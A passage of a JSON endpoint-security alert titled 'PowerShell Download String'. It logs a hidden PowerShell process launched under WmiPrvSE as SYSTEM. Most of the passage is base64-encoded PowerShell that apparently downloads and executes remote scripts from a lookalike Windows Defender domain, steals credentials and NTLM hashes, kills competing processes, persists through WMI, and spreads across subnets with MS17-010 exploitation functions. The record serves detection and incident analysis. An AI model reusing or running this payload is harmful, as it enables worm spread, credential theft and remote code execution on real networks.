ALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating 